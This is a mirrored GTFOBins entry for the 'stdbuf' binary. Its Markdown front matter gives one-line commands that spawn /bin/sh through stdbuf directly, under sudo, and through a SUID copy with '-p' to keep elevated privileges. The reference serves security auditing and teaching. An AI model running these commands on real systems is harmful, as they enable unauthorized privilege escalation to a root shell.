mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
10 lines
177 B
Markdown
10 lines
177 B
Markdown
|
---
|
||
|
functions:
|
||
|
execute-interactive:
|
||
|
- code: stdbuf -i0 /bin/sh
|
||
|
sudo-enabled:
|
||
|
- code: sudo stdbuf -i0 /bin/sh
|
||
|
suid-enabled:
|
||
|
- code: ./stdbuf -i0 /bin/sh -p
|
||
|
---
|